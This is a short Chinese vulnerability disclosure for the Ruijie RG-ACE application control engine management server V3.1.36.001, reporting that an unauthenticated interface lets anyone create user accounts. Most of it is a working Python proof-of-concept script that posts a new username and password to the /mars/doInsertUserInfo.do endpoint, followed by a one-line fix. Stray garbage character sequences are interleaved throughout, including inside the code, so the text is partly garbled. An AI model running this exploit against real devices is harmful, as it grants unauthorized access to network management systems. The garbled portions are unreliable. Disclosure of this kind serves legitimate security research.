锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
. f2 V* l, L; l

  L, P* s8 N1 D# {: O# ^测试的具体版本是
产品名称: 锐捷应用控制引擎
" s$ z' R) e6 ~3 |1 ^" j3 X6 ~5 |版本号: 3.1.36.001 TC
  F2 ~% Q- h8 [" X编译时间: 201104291730
6 k. E3 {1 E  @: ]' P/ c
- Y6 v( x  l8 E) i
漏洞证明：

) N) G4 V6 W4 m" b
6 E' X! i8 O6 a8 y" R
, _4 i" V+ e, x7 [; U# Y/ D

2 U4 j1 T2 b' k3 j
0 `. u" j9 d2 M0 a7 k执行脚本
#! /usr/bin/env python
  S- k( t8 {0 l; Y#coding=gbk
! ]0 Y6 c! ~. r3 P#RG-ACE管理服务器 V3.1.36.001
; z# t: Q* c  s( \7 bimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
/ T% M9 u1 ^- b) Q& Yopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, D5 x  V" B, b5 L0 B  epost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
- O" z) y: {8 h3 ]9 t9 @("useropermanager","userManager"),
("userName","t"), #######账号自己加
" i2 [+ ~9 Z# S" A("pwd","aaaaaa"),######密码自己加
% L) S% {6 y/ R6 W# Y2 H% r+ Y8 a("trueName","ad"),
("email",""),
. Y- e$ g; Z4 u% L' b8 I("mobilePhone",""),
("officePhone",""),
/ p; Q4 h: {4 G$ r! H4 D1 z; X("addr",""),
("submit","确定"))
7 A: Y  W8 e! P7 a( gurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
& l  a' F6 e% Z- B* d, S  fprint "Done"
* O, \  f  D" Q7 L
登录，连接设备





2 C! c( _2 }8 Z- s, Y默认的管理员admin权限更大点
) X  A( ^+ R6 y6 o
9 ~1 f+ n; g! s; Z

6 v4 d+ C  U! L
! L0 v) e. _+ G" t! _
+ M! z& ?& y: N, x/ S修复方案：
; c7 U2 j" @: T3 [/ S5 i加强对接口的权限验证
8 q3 Q% M3 i  X# Q  ?